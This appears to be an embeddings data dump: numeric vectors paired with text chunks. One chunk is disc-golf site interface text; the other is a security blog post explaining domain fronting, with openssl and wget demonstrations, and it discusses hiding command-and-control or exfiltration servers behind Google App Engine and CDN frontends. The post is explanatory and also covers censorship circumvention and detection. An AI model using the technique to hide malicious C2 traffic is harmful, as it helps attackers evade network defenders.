-0.03422856330871582, 0.01773306168615818, 0.03946274146437645, 0.019454311579465866, 0.030528681352734566, 0.0271590705960989, -0.006287175230681896, -0.034634776413440704, 0.02004595845937729, 0.06792555749416351, -0.047188155353069305, 0.09012705087661743, 0.04728427529335022, -0.033437035977840424, -0.03399438410997391, 2.0238423789969937e-33, 0.05466315895318985, 0.002562148729339242, -0.053568869829177856, 0.03023565746843815, 0.06225427985191345, -0.03254345431923866, -0.04463540390133858, 0.011572277173399925, -0.023393256589770317, 0.017258547246456146, -0.0009564375504851341, 0.0013382615288719535, 0.038077086210250854, -0.0967244952917099, -0.02922152541577816, 0.05702421814203262, -0.09163226932287216, -0.024676240980625153, 0.020857317373156548, -0.0014356052270159125, 0.018897294998168945, 0.01730283536016941, -0.05746617540717125, -0.01789875701069832, -0.08088856935501099, 0.081626757979393, 0.03054751455783844, -0.011140209622681141, 0.01564626209437847, 0.016506539657711983, -0.0779278352856636, 0.04875853657722473, 0.12677764892578125, -0.001093622064217925, -0.01438524853438139, -0.03512630611658096, 0.0458955354988575, 0.03659597039222717, -0.07162552326917648, 0.006848106626421213, -0.08194269239902496, 0.02792399749159813, 0.014530842192471027, -0.03280332684516907, -0.05372622609138489, -0.03198564052581787, -0.015508287586271763, -0.0027638643514364958, 0.020366910845041275, -0.04065752401947975, 0.07929398119449615, -0.053034115582704544, 0.11888130754232407, 0.011625229381024837, -0.0017367878463119268, 0.11807867139577866, -0.018116557970643044, -0.006906912662088871, 0.08362086862325668, 0.05070924013853073, 0.11518100649118423, 0.024911819025874138, 0.014287811703979969, 0.03320050612092018, -0.045931532979011536, -0.03060186840593815, -0.008646814152598381, -0.030255544930696487, 0.013952548615634441, -0.01955072209239006, -0.007631158456206322, 0.05797514691948891, 0.0022743651643395424, -0.09605921059846878, -0.0394175760447979, 0.038611531257629395, -0.10215786099433899, 0.008211091160774231, -0.03622908890247345, 0.009121506474912167, 0.015697337687015533, -0.005595143884420395, 0.028754211962223053, -0.009001530706882477, -0.05614615976810455, -0.03176858276128769, -0.05515512451529503, -0.03439890220761299, -0.057916492223739624, 0.1000649631023407, -0.044816721230745316, 0.03622069209814072, -0.036472175270318985, -0.05132032558321953, 0.02132989466190338, -3.7615525352725495e-33, 0.022752488031983376, -0.03917638584971428, 0.013641725294291973, 0.0729929506778717, 0.04750403016805649, -0.12434820085763931, 0.0017193715320900083, 0.03639717772603035, 0.08686904609203339, -0.037479400634765625, 0.027596330270171165, -0.019725289195775986, -0.044005684554576874, -0.026739565655589104, 0.05890212953090668, -0.03891897574067116, 0.0007279306300915778, 0.043075259774923325, -0.044713426381349564, 0.071589894592762, 0.0060525075532495975, -0.02151588536798954, -0.03782574459910393, -0.04199494421482086, 0.023632632568478584, -0.010167621076107025, 0.07778384536504745, 0.03401051089167595, -0.062291212379932404, -0.006217978894710541, -0.014873301610350609, -0.028616424649953842, 0.09096124768257141, 0.006707279942929745, -0.08605139702558517, 0.08341668546199799, -0.08064229786396027, -0.023191317915916443, -0.01395893283188343, -0.0950789749622345, 0.08905039727687836, 0.018913554027676582, -0.058514516800642014, -0.004605014342814684, 0.04240924492478371, 0.027632957324385643, 0.03321853280067444, 0.09976424276828766, 0.061484288424253464, -0.033875513821840286, -0.0008463177364319563, -0.028704416006803513, -0.043185990303754807, 0.06577856093645096, -0.024529730901122093, -0.02859516069293022, -0.0423920676112175, -0.008741994388401508, -0.017662493512034416, 0.0438997857272625, -0.03106183558702469, 0.01190137304365635, -0.02726772427558899, -0.00995603296905756, -0.027086764574050903, 0.08660173416137695, -0.05633152648806572, -0.06190681457519531, -0.035020601004362106, 0.0670982152223587, 0.0395379476249218, -0.035840507596731186, -0.08171126991510391, 0.031142650172114372, 0.02717614732682705, 0.12003064155578613, -0.06191721931099892, 0.09269087761640549, -0.0917707160115242, 0.008566584438085556, -0.03772329166531563, -0.07988230884075165, -0.07842271775007248, 0.04416685923933983, 0.0536317303776741, 0.03865756094455719, 0.013538415543735027, 0.006765980739146471, 0.022660020738840103, -0.010184254497289658, -0.11225473880767822, -0.08046607673168182, 0.0006346233421936631, -0.04476727545261383, -0.14014574885368347, -5.885285148110597e-8, -0.07852693647146225, 0.05164806544780731, -0.08515363931655884, -0.02788054384291172, 0.019100263714790344, 0.16194705665111542, 0.0014703237684443593, 0.013655128888785839, 0.03263234719634056, 0.06379548460245132, 0.0625414177775383, -0.04048038646578789, -0.018588123843073845, 0.014914439059793949, -0.06523957848548889, 0.039566583931446075, -0.05670250207185745, -0.13441666960716248, 0.010105150751769543, -0.06694987416267395, -0.05447889119386673, -0.027546729892492294, 0.07132197171449661, 0.053646575659513474, 0.0472220703959465, -0.02238152176141739, -0.06982886791229248, 0.007464379537850618, -0.022396471351385117, -0.052484020590782166, -0.011196001432836056, -0.0019342228770256042, -0.076540008187294, 0.025339506566524506, -0.0045134518295526505, -0.024245914071798325, 0.09462930262088776, 0.04366397485136986, 0.025349652394652367, 0.016050102189183235, -0.02578129805624485, -0.03611186146736145, -0.05392132326960564, -0.06307260692119598, -0.008812460117042065, 0.012118523009121418, 0.03382045403122902, -0.042281683534383774, -0.05613086000084877, 0.07782168686389923, -0.03835366293787956, -0.04290074482560158, -0.0939711257815361, 0.038166165351867676, 0.09040749818086624, -0.039961256086826324, 0.02514123171567917, -0.029644977301359177, -0.01813477836549282, 0.06726942211389542, 0.0320245623588562, -0.01870013028383255, -0.006446202751249075, -0.03607369586825371 ]
Add to bag ? You can use these filters to attempt to find similar discs this can be useful when switching between brands or looking for a replacement of a hard to find to disc you can also look for complements to a disc if you want to find a more overstable or understable counterpart to a particular disc, increase the tolerance to widen the search or decrease it to narrow down the search. Currently not filtered Less Stable Similar More Stable Faster Slower Reset Filter Delete Add to bag ? Here we can add discs that aren't in the database easiest is if you copy and modify an already existing disc. Distance is measured in feet and is roughly between 0-450 feet and is the distance the disc will achieve when thrown at its intended speed. HSS aka High Speed Stability(turn) is measured between -100 to 100 and is usually negative LSS aka Low Speed Stability(fade) is measured between -100 to 100 and is usually positive Type is the classification for the disc. Name ? Name of the disc you want to add. Distance ? Distance of the disc you want to add when thrown at its intended speed. HSS ? High Speed Stability(turn) is a value between -100 to 100. LSS ? Low Speed Stability(fade) is a value between -100 to 100. Type ? The Classification of the disc you want to add. Putter Midrange Fairway Driver Distance Driver Copy Add tolerance for similarity)
[ 0.015111536718904972, -0.0389958880841732, -0.08871808648109436, -0.04097289219498634, -0.025703290477395058, -0.01435481384396553, 0.015888947993516922, 0.08511264622211456, -0.03691285476088524, -0.03181736171245575, 0.09619861096143723, -0.007050798274576664, -0.0017513943603262305, -0.05975920334458351, -0.039272259920835495, 0.020264754071831703, 0.06520326435565948, 0.03492898494005203, -0.08456739038228989, -0.01906058005988598, 0.08141498267650604, -0.014929281547665596, 0.0012334242928773165, 0.009493660181760788, -0.07371386885643005, 0.004005005583167076, -0.07208453863859177, 0.0036391548346728086, 0.012179534882307053, -0.06792981177568436, -0.020384566858410835, 0.06857115030288696, 0.05102157220244408, 0.012127075344324112, 0.021444497630000114, -0.05177781730890274, -0.05020669847726822, 0.05629003793001175, -0.03969765082001686, -0.09193965792655945, -0.04550040513277054, 0.02601584419608116, 0.041766226291656494, 0.0388902984559536, -0.0778060257434845, 0.02886827103793621, -0.11914336681365967, -0.03576437011361122, 0.05086994171142578, -0.017003528773784637, -0.015743641182780266, 0.016460049897432327, 0.025807777419686317, 0.04903673380613327, 0.029700173065066338, 0.0014541959390044212, -0.00355668761767447, 0.01852739229798317, 0.002914638724178076, -0.09467380493879318, 0.07003944367170334, -0.08229834586381912, 0.010214000009000301, -0.057520292699337006, 0.005461601074784994, -0.022189192473888397, -0.022742783650755882, -0.02172798290848732, -0.006191079504787922, 0.08265327662229538, -0.05879731476306915, 0.10949194431304932, -0.01508168876171112, 0.06539637595415115, -0.007067342754453421, 0.0026335157454013824, 0.048524245619773865, 0.0276072695851326, -0.034442104399204254, 0.011797345243394375, -0.02948412485420704, -0.04297139495611191, 0.017905814573168755, -0.03709745407104492, -0.011473988182842731, 0.033165596425533295, 0.021535927429795265, 0.007663806900382042, 0.0630926564335823, 0.005962860304862261, 0.009029630571603775, 0.06261971592903137, 0.012617773376405239, -0.09887400269508362, -0.08351276069879532, 0.04609238728880882, -0.01010868139564991, -0.0014800968347117305, 0.02013871818780899, -0.0003133423742838204, 0.013225299306213856, 0.043672073632478714, -0.04173868149518967, 0.007077389396727085, -0.039227135479450226, -0.028046250343322754, 0.036956846714019775, 0.007544477935880423, -0.03540928661823273, 0.02733590453863144, -0.028779879212379456, 0.04683233052492142, -0.015635741874575615, -0.06312784552574158, -0.006761434022337198, 0.038299184292554855, -0.009572256356477737, 0.058086272329092026, -0.09771714359521866, -0.12443128228187561, -0.0015546662034466863, -0.04710058495402336, 0.010438296012580395, -0.07225435227155685, 0.042680103331804276, 0.028087403625249863, 0.0328579880297184, 4.6653489993175276e-33, 0.0029155847150832415, 0.06166745722293854, -0.018623078241944313, 0.009179896675050259, -0.08467143028974533, -0.10131043195724487, -0.0029761872719973326, 0.08822130411863327, 0.045623455196619034, 0.08126578480005264, -0.07980383932590485, -0.00018030052888207138, -0.1098925769329071, -0.010648812167346478, 0.023515718057751656, -0.053151410073041916, 0.027279775589704514, -0.016523294150829315, -0.022945461794734, -0.05845177173614502, -0.023856351152062416, -0.07399677485227585, 0.030516868457198143, -0.09110123664140701, 0.09131314605474472, -0.007910684682428837, -0.0059573533944785595, -0.02460114099085331, 0.018700551241636276, 0.026743752881884575, -0.0055800145491957664, 0.00008729685214348137, -0.05373444780707359, -0.016401976346969604, 0.02288845181465149, 0.02070501074194908, -0.10318927466869354, 0.020624518394470215, 0.0661061704158783, 0.005519229453057051, 0.026367129758000374, 0.014691665768623352, -0.02356737107038498, 0.020502779632806778, 0.037706393748521805, -0.007943873293697834, 0.06068839505314827, -0.012109089642763138, -0.004697986878454685, 0.0714014321565628, -0.0028681408148258924, 0.026773609220981598, -0.049639780074357986, -0.0168605949729681, -0.07318539917469025, 0.048191267997026443, 0.07772240042686462, 0.008802352473139763, -0.017766904085874557, 0.12325817346572876, 0.04215347021818161, -0.02798101119697094, 0.009681045077741146, -0.017530566081404686, 0.040360935032367706, 0.0797852948307991, 0.033624082803726196, -0.038103263825178146, 0.026922570541501045, -0.0495893619954586, -0.0009498748695477843, -0.11189865320920944, 0.012196649797260761, 0.029730498790740967, 0.07116705924272537, -0.03738095611333847, 0.012901946902275085, 0.02618514932692051, -0.034882184118032455, -0.0895356833934784, -0.07495206594467163, 0.019029121845960617, -0.12816382944583893, 0.036683376878499985, -0.011395473964512348, -0.017828643321990967, -0.008060264401137829, -0.014613929204642773, -0.03196945786476135, -0.08957686275243759, -0.05069801211357117, -0.00828641839325428, -0.020479604601860046, 0.020496975630521774, 0.00807750690728426, -4.2788593137366215e-33, 0.03947146236896515, -0.0667453408241272, 0.046788159757852554, 0.066112220287323, 0.04617421329021454, 0.049177348613739014, 0.03568617254495621, 0.028396496549248695, 0.037957560271024704, -0.07529227435588837, -0.07775121182203293, -0.03475586324930191, -0.08783628791570663, 0.013342797756195068, -0.04920449107885361, 0.08546062558889389, -0.07705877721309662, 0.023971205577254295, 0.009067223407328129, 0.033571187406778336, 0.01989154703915119, 0.054070912301540375, 0.024720869958400726, 0.003027484752237797, 0.017523696646094322, 0.06122829020023346, 0.059759967029094696, -0.0324452705681324, -0.006726373452693224, -0.05397975817322731, -0.05898488312959671, 0.008011803030967712, 0.07258807122707367, 0.04065841808915138, -0.011159415356814861, -0.1161717101931572, 0.011773063801229, -0.05406259000301361, -0.013157706707715988, -0.0026160001289099455, -0.007507098838686943, 0.05183577910065651, -0.029441049322485924, -0.014117913320660591, -0.012353064492344856, -0.03144817426800728, 0.0040179225616157055, 0.012259270064532757, 0.06293393671512604, 0.07659146934747696, 0.019811538979411125, 0.009294013492763042, -0.06548753380775452, 0.08764193207025528, 0.09938062727451324, 0.03286248445510864, -0.0070632100105285645, -0.01859290339052677, 0.00581106124445796, -0.03626738488674164, -0.10275482386350632, 0.03464921563863754, -0.01347629725933075, 0.05209774896502495, 0.08089174330234528, 0.07055989652872086, 0.07433392852544785, -0.058243799954652786, -0.09085366129875183, -0.03594838082790375, -0.04391596093773842, -0.012220797128975391, 0.10696975141763687, -0.021695755422115326, -0.03174503892660141, -0.11651400476694107, 0.019256621599197388, -0.03641944378614426, 0.06113467738032341, 0.0671079084277153, -0.14362689852714539, 0.029722638428211212, 0.00011775059101637453, 0.11276113241910934, -0.023906227201223373, 0.030479570850729942, -0.07767467200756073, -0.052037447690963745, 0.05406222864985466, 0.004713590256869793, 0.03065492957830429, 0.06370054185390472, 0.013786254450678825, 0.008176653645932674, -0.03507276996970177, -5.377432188424791e-8, -0.008228766731917858, -0.019992126151919365, -0.04006204009056091, 0.022713059559464455, 0.08310668170452118, 0.04832536727190018, -0.06784533709287643, 0.09958702325820923, -0.10351776331663132, -0.10795612633228302, 0.11563464254140854, 0.049765557050704956, -0.010803740471601486, 0.013834428042173386, -0.0513664148747921, -0.04541563242673874, 0.0002709111722651869, 0.05418364331126213, -0.046831026673316956, 0.06715282052755356, -0.01971525140106678, 0.03441663086414337, 0.08681987971067429, 0.041312556713819504, 0.024234948679804802, 0.02852998487651348, -0.0486261248588562, -0.04705045744776726, 0.03490893170237541, -0.029018111526966095, 0.0915505588054657, 0.012292955070734024, 0.04397575557231903, 0.06504938006401062, 0.06183556467294693, -0.011131052859127522, -0.07086607068777084, 0.04366489499807358, -0.001550195855088532, 0.15746746957302094, 0.05130938068032265, 0.07051810622215271, -0.08660888671875, 0.026027625426650047, 0.056670282036066055, 0.026099396869540215, -0.015002897009253502, -0.07500327378511429, -0.060378316789865494, 0.043874334543943405, -0.006937807891517878, -0.0372220054268837, -0.0008424562984146178, 0.01728671044111252, -0.05328947305679321, 0.02470766380429268, -0.046689193695783615, 0.0061904327012598515, -0.010025928728282452, 0.06758323311805725, 0.039988499134778976, -0.05721715837717056, 0.014216451905667782, 0.03933550417423248 ]
by In today’s post we are goint to talk about a somewhat old technique (although programs like Signal have recently started using it) that I have always found to be a really clever hack: domain fronting. For example, let’s take the IP address of the frontal that serves www.google.es: $ host www.google.es www.google.es has address 216.58.210.227 If we take a look at the Common Name (CN) field of the TLS certificate returned by the server: $ echo | openssl s_client -CApath /usr/lib/ssl -connect 216.58.210.227:443 | openssl x509 -subject depth=3 C = US, O = Equifax, OU = Equifax Secure Certificate Authority verify return:1 depth=2 C = US, O = GeoTrust Inc., CN = GeoTrust Global CA verify return:1 depth=1 C = US, O = Google Inc, CN = Google Internet Authority G2 verify return:1 depth=0 C = US, ST = California, L = Mountain View, O = Google Inc, CN = google.com verify return:1 DONE subject= /C=US/ST=California/L=Mountain View/O=Google Inc/CN=google.com -----BEGIN CERTIFICATE----- MIIgWjCCH0KgAwIBAgIIHcanliJsJ+UwDQYJKoZIhvcNAQELBQAwSTELMAkGA1UE BhMCVVMxEzARBgNVBAoTCkdvb2dsZSBJbmMxJTAjBgNVBAMTHEdvb2dsZSBJbnRl [...] We see that it’s not www.google.es. This certificate is authenticating a name that is not present in its CN. The subcommand x509 (with which we can get more info about the cert) has the answer: $ echo | openssl s_client -CApath /usr/lib/ssl -connect 216.58.210.227:443 | openssl x509 -text [...] X509v3 extensions: X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Subject Alternative Name: DNS:google.com, DNS:*.2mdn.net, DNS:*.android.com, DNS:*.appengine.google.com, DNS:*.au.doubleclick.net, DNS:*.cc-dt.com, DNS:*.cloud.google.com, DNS:*.de.doubleclick.net, DNS:*.doubleclick.com [...] The HTTPS server is using the Subject Alternative Name (SAN) extension, that makes it possible to serve more than one HTTPS website from the same IP address using just one X.509 certificate. We can also use (HTTPS client side) another more recent TLS protocol extension called Server Name Indication (SNI) to request any of the virtual hosts available from the same IP address. We can invoke the s_client subcommand with the -servername modifier to request any of the other vhosts available; for example, mail.google.com: $ echo | openssl s_client -CApath /usr/lib/ssl \ -connect 216.58.210.227:443 -servername mail.google.com | openssl x509 -subject depth=3 C = US, O = Equifax, OU = Equifax Secure Certificate Authority verify return:1 depth=2 C = US, O = GeoTrust Inc., CN = GeoTrust Global CA verify return:1 depth=1 C = US, O = Google Inc, CN = Google Internet Authority G2 verify return:1 depth=0 C = US, ST = California, L = Mountain View, O = Google Inc, CN = mail.google.com verify return:1 DONE subject= /C=US/ST=California/L=Mountain View/O=Google Inc/CN=mail.google.com -----BEGIN CERTIFICATE----- MIID1jCCAr6gAwIBAgIIGOTyaAwrvk4wDQYJKoZIhvcNAQELBQAwSTELMAkGA1UE BhMCVVMxEzARBgNVBAoTCkdvb2dsZSBJbmMxJTAjBgNVBAMTHEdvb2dsZSBJbnRl [...] If we look at a capture of the previous interaction with Wireshark, we can clearly see the field of the SNI extension; the TLS client has told the server (in the ClientHello message of the TLS handshake) that it wants the virtual host of the GMail service: In fact, in the case of Google (and this also happens with many other CDN networks and frontal servers, hence the name of the technique: domain fronting), it’s not even necessary to use the TLS SNI extension; it’s enough to point against the same IP address, but specifying the desired virtual host using the Host HTTP header: $ wget -q -S --max-redirect=1 --header 'Host: mail.google.com' www.google.es HTTP/1.1 301 Moved Permanently Location: /mail/ Content-Type: text/html; charset=UTF-8 [...] Thus, as a result of the command above, someone who is monitoring the network just gets to see a request to www.google.es: the traffic of the interactions with mail.google.com stays inside, camouflaged in the TLS layer unless we break that layer with dynamic cert generation from a certification authority present in all workstations (even in this case, the MitM is going to have trouble with things like certificate pinning). So, what’s the advantage? Yes, we all know that Google uses the same frontals for everything, so what? What we get by hiding GMail traffic inside generic Google searches? Well, if we base our command & control or exfiltration server on GMail, we have a direct advantage, but the thing goes beyond: Google App Engine (GAE) apps, hosted (among others) on *.appspot.com domains, are also served from the same frontals. So in this particular case, it’s not only that we could deploy our C&C server on GMail web services (or Google Drive, or Google Docs…): it’s that we can hack it directly as a GAE app in myc2server.appspot.com, and network monitoring will not even see the DNS requests against that domain (the only registered traffic will be DNS requests for www.google.es and apparently legitimate, generic, boring Google search traffic). And what is better: to dismantle our stuff, or Google detects somehow that we have an ilegitimate C&C server hosted on myc2server.appspot.com, or the network monitoring staff has to “break” HTTPS (or block all HTTPS traffic in general, or HTTPS access to all Google frontal servers in particular). This is not going to be good news for the company: no Google web search available? What!? :-) And this is the reason that this technique is so powerful: if you block the frontals, you block a lot of other useful services, and this has high collateral damage. It’s because of this that the technique is widely used for content filter and DPI bypass, and it’s used in Internet censorship circumvention tools such as Lantern, Psiphon, now Signal, and Tor pluggable transports such as Meek. Without having to search too much :-) we can find numerous gadgets that people have deployed on The Internets… For example, here we have a Twitter reflector: $ wget -qO- https://3benben.appspot.com <html> <head> <title>GAE Twitter API Proxy</title> <link href='https://appengine.google.com/favicon.ico' rel='shortcut icon' type='image/x-icon' /> <style>body { padding: 20px 40px; font-family: Verdana, Helvetica, Sans-Serif; font-size: medium; }</style> </head> <body><h2>GTAP v0.4.2 is running!</h2></p> <p><a href='/oauth/session'><img src='/static/sign-in-with-twitter.png' border='0'></a> <== Need Fuck GFW First!! or <a href='/oauth/change'>change your key here</a></p> <p>This is a simple solution on Google App Engine which can proxy the HTTP request to twitter's official REST API url.</p> <p><font color='red'><b>Don't forget the "/" at the end of your api proxy address!!!.</b></font></p> </body></html> With it we can visit the SecurityArtWork Twitter account :-) without even touching directly Twitter servers (obviously, the reflector gets all your requests, so be careful): $ wget -O- --header='Host: 3benben.appspot.com' \ https://www.google.es/securityartwork | fgrep description | head -1 [...] <meta name="description" content="The latest Tweets from Security Art Work (@Securityartwork). Information Security Blog #infosec #cybersecurity #hacking #intelligence S2Grupo Company @s2grupo · s2grupo.es. España, Mexico, Colombia"> [...] This will work from countries or networks in which Twitter is blocked, as long as Google HTTPS frontal servers are not blocked ;-) There are a lot of CDN networks that can be (ab)used in this way; for example, Meek supports the usage of a reflector hosted in Amazon CloudFront. This reflector proxies to a Tor network bridge: $ wget -qO- https://a0.awsstatic.com/ --header 'Host: d2zfqthxsdq309.cloudfront.net' I’m just a happy little web server. In this way, it’s possible to use the Tor network, and from the outside network monitoring will only get to see HTTPS accesses to the front domain a0.awsstatic.com, used for a bunch of stuff. The same happens with the Microsoft Azure CDN network: $ wget -qO- https://ajax.aspnetcdn.com/ --header 'Host: az786092.vo.msecnd.net' I’m just a happy little web server. In the same way that we could host our C2/exfiltration server on Google App Engine, the above examples show how to make the same thing with a VPS hosted on CloudFront or Azure. This technique can be used to mask any type of network traffic; from outside it will seem like usual access to the corresponding frontal server. So be careful with contacts with CDN networks and frontal server: they are not always what they seem! :-) From the ignorance of the one who writes (any info is welcome! Feel free to comment!), there are no published reports of APT groups that use this technique directly, but it would not be really surprising that it’s in active usage as a common practice to circumvent egress controls and monitoring (there is information about some cases in which services like Google Docs, Google Drive, Google Apps Script, and so on have been used for C&C or exfiltration, but as far as we know by now, they didn’t use domain fronting: they didn’t hide the access to domains like docs.google.com, which would be a step beyond). Of course, this is a technique relatively easy to detect by using traffic analysis (because although the domain that we see is only the frontal server domain, in reality the traffic corresponds to that of the embedded service, and that’s going to produce a more or less distinguishable fingerprint, size and timing of network packets, and so on), or anomaly detection (for an easy one, if the HTTPS/TLS client fingerprint it’s not hidden properly, we’ll detect the malware), but that’s another story… ;-) Best regards! @pmarinram Really cool stuff
[ -0.09454420953989029, 0.015779098495841026, 0.04745059832930565, -0.08051864802837372, -0.03489263728260994, -0.1283068060874939, -0.01961386762559414, -0.07720034569501877, 0.03957580029964447, -0.05716212838888168, -0.05170062556862831, 0.03437488153576851, 0.09431569278240204, -0.07926223427057266, 0.014405801892280579, -0.06103243678808212, -0.040312401950359344, 0.03872024267911911, 0.055693190544843674, -0.06458628177642822, -0.043547894805669785, -0.014962693676352501, -0.027029624208807945, -0.004153240937739611, -0.07081139832735062, -0.05083752050995827, -0.0034886905923485756, 0.022307083010673523, -0.02431563287973404, -0.06607002019882202, 0.01876862160861492, 0.06333933025598526, 0.020428020507097244, 0.05106460675597191, -0.06640516966581345, 0.022802205756306648, 0.0335809588432312, 0.056172601878643036, -0.021712947636842728, 0.004025076981633902, 0.07399147748947144, -0.13494084775447845, 0.08641250431537628, 0.03322243690490723, -0.05576096847653389, 0.05172719433903694, 0.01511154044419527, -0.03259521350264549, -0.02048908919095993, -0.09991591423749924, 0.03035116381943226, -0.037135444581508636, -0.03429005667567253, 0.06026554852724075, -0.11203768104314804, 0.014611799269914627, -0.026910018175840378, 0.035813041031360626, 0.01796320453286171, 0.11210796982049942, 0.03254247456789017, 0.03530465438961983, -0.02018120139837265, -0.004955084063112736, 0.031114308163523674, -0.01443524844944477, -0.022788329049944878, -0.038374364376068115, 0.01394827663898468, 0.017132539302110672, 0.04592619836330414, -0.02344968169927597, -0.05619552358984947, 0.0020529439207166433, 0.005025813356041908, 0.018411139026284218, -0.09176995605230331, -0.0217518862336874, -0.0017676226561889052, -0.06327350437641144, 0.05139435455203056, -0.009034181013703346, -0.01526636816561222, 0.07521583884954453, 0.002261072862893343, 0.029956994578242302, -0.025193149223923683, -0.0767659991979599, 0.10814397037029266, 0.01348540373146534, 0.01164273638278246, -0.08732569217681885, 0.019570764154195786, 0.050548870116472244, 0.02895619161427021, 0.051879581063985825, 0.0026347043458372355, -0.047240402549505234, -0.03665223345160484, 0.010373396798968315, 0.022575920447707176, 0.030759133398532867, 0.012061543762683868, -0.08556832373142242, 0.016725236549973488, 0.051649920642375946, 0.03148370981216431, 0.0788097232580185, 0.08587835729122162, -0.036292050033807755, 0.007291773334145546, 0.011632557958364487, 0.039370305836200714, -0.10595279186964035, -0.04210943356156349, 0.00710528576746583, 0.036323800683021545, 0.022010020911693573, 0.08481240272521973, -0.08369096368551254, -0.0009883804013952613, 0.01416724268347025, -0.010175823234021664, -0.003842993639409542, 0.08046869933605194, -0.049869194626808167, 0.02308478392660618, 1.2208390454052572e-32, 0.10552408546209335, 0.17540781199932098, 0.008126615546643734, -0.021844597533345222, -0.04691372811794281, 0.0177859328687191, 0.020974349230527878, 0.042120300233364105, -0.04304860159754753, 0.1367625892162323, 0.027875550091266632, 0.06911025196313858, 0.020138727501034737, -0.019727982580661774, 0.04899340495467186, 0.03772174194455147, -0.03050168789923191, -0.011425451375544071, -0.02416040375828743, 0.009416328743100166, 0.029427476227283478, -0.00029809106490574777, 0.028068333864212036, -0.0241609625518322, 0.015963153913617134, 0.017808783799409866, -0.08159100264310837, 0.008639301173388958, 0.051468078047037125, 0.015489486977458, 0.00017185248725581914, 0.0188523568212986, -0.002887839451432228, 0.04761475324630737, 0.09441956132650375, 0.012541217729449272, 0.10259390622377396, -0.021096238866448402, 0.010728458873927593, 0.026766760274767876, 0.008373940363526344, 0.036539167165756226, 0.0038425649981945753, 0.04432031512260437, 0.01221973542124033, -0.015094944275915623, -0.0934465229511261, -0.04292003810405731, 0.05433987081050873, 0.03810970112681389, -0.00408332422375679, -0.026213310658931732, -0.04122886806726456, -0.024530693888664246, -0.03436930850148201, -0.014308668673038483, -0.005762476474046707, 0.03873696178197861, -0.026341799646615982, 0.07970789819955826, 0.016222773119807243, -0.014533772133290768, -0.11159098148345947, 0.011675343848764896, -0.008022919297218323, -0.043968893587589264, 0.02168360911309719, -0.011152382008731365, -0.0931585431098938, 0.04608754813671112, -0.03259255364537239, 0.08427590876817703, -0.024772215634584427, -0.01857379451394081, -0.04827587306499481, -0.012754473835229874, 0.004187841434031725, 0.13201318681240082, 0.09379889070987701, -0.07992950826883316, 0.06826476752758026, -0.007071046158671379, 0.029446162283420563, 0.06788546591997147, -0.035552266985177994, 0.06891143321990967, 0.05611604079604149, -0.06198335811495781, -0.10611237585544586, 0.008013008162379265, -0.08572990447282791, -0.013907043263316154, 0.05286882072687149, 0.03432043641805649, -0.08130700886249542, -1.1386775738809458e-32, -0.08961788564920425, -0.022840434685349464, 0.005913449451327324, 0.0560438372194767, -0.010191037319600582, -0.12446439266204834, 0.045198824256658554, 0.04396842047572136, 0.0016787837957963347, 0.06244999170303345, 0.031120408326387405, -0.042490046471357346, 0.07648953050374985, 0.014036882668733597, 0.06953375786542892, -0.09083069115877151, -0.01760184019804001, -0.002158781513571739, -0.15067121386528015, -0.02257334627211094, -0.01546410471200943, 0.014785406179726124, -0.045681245625019073, 0.025065850466489792, 0.016850775107741356, 0.028404654935002327, -0.022772720083594322, 0.020247168838977814, -0.034236740320920944, 0.024205151945352554, -0.06175684556365013, 0.03536388278007507, 0.050598300993442535, 0.03453603759407997, -0.09368342906236649, 0.01603628136217594, -0.0036427851300686598, 0.09374840557575226, 0.046145226806402206, -0.08797707408666611, 0.014429471455514431, -0.010503550991415977, -0.00020992335339542478, -0.03858271613717079, -0.029490208253264427, 0.0031249781604856253, -0.09212927520275116, 0.11507455259561539, -0.050940822809934616, 0.04911345615983009, 0.03177278861403465, 0.013377031311392784, 0.009411786682903767, -0.01812077686190605, 0.0024454116355627775, 0.016905123367905617, 0.025493228808045387, 0.00912113394588232, 0.01478760875761509, -0.04085678234696388, 0.04155272990465164, 0.02397933602333069, -0.051846813410520554, 0.027988865971565247, 0.06581462174654007, 0.058588024228811264, -0.1145489513874054, 0.006765438709408045, 0.013773936778306961, -0.004919236060231924, 0.036651212722063065, -0.09340005367994308, -0.059742532670497894, -0.11017663776874542, 0.05278058350086212, 0.024272050708532333, 0.05090848729014397, -0.008107280358672142, -0.02327866293489933, 0.08089955151081085, 0.06878654658794403, -0.06352856755256653, -0.0029918525833636522, -0.03635171428322792, 0.06302349269390106, 0.04864736646413803, 0.008762874640524387, 0.0022822970058768988, -0.025951417163014412, 0.018946290016174316, -0.05780602991580963, 0.07493984699249268, -0.03883518651127815, 0.05018205940723419, 0.08581717312335968, -7.127685108798687e-8, -0.006922646891325712, -0.007222087122499943, -0.09375088661909103, 0.050189655274152756, 0.0038760434836149216, 0.044560015201568604, 0.015222745016217232, -0.07625380903482437, -0.024039704352617264, -0.04520929604768753, -0.002237519947811961, -0.03575298935174942, -0.029929736629128456, -0.018718507140874863, -0.01846611686050892, -0.007135401014238596, -0.07177691161632538, -0.036443427205085754, -0.07199855148792267, -0.01999681070446968, -0.06436045467853546, 0.0169311985373497, 0.017632726579904556, -0.037688951939344406, -0.06376735866069794, -0.012550742365419865, 0.014474690891802311, 0.010716934688389301, -0.004243824165314436, 0.030117681249976158, -0.05114341154694557, -0.058538004755973816, 0.00016284614684991539, 0.05111154541373253, -0.02210024558007717, 0.10121496766805649, -0.09776526689529419, -0.05840913951396942, 0.023927222937345505, 0.08996769785881042, -0.022953322157263756, 0.031522154808044434, 0.002542987698689103, 0.024632209911942482, -0.01941242814064026, 0.015400058589875698, 0.0578790158033371, 0.009003253653645515, 0.09585856646299362, 0.003998661879450083, -0.03308011218905449, -0.048612773418426514, -0.042414139956235886, -0.0364418588578701, -0.02650296501815319, -0.010314497165381908, 0.022465243935585022, -0.02883525751531124, -0.09070985019207001, 0.05328547954559326, 0.0072203935123980045, -0.03507561981678009, 0.027801217511296272, 0.05732458457350731 ]
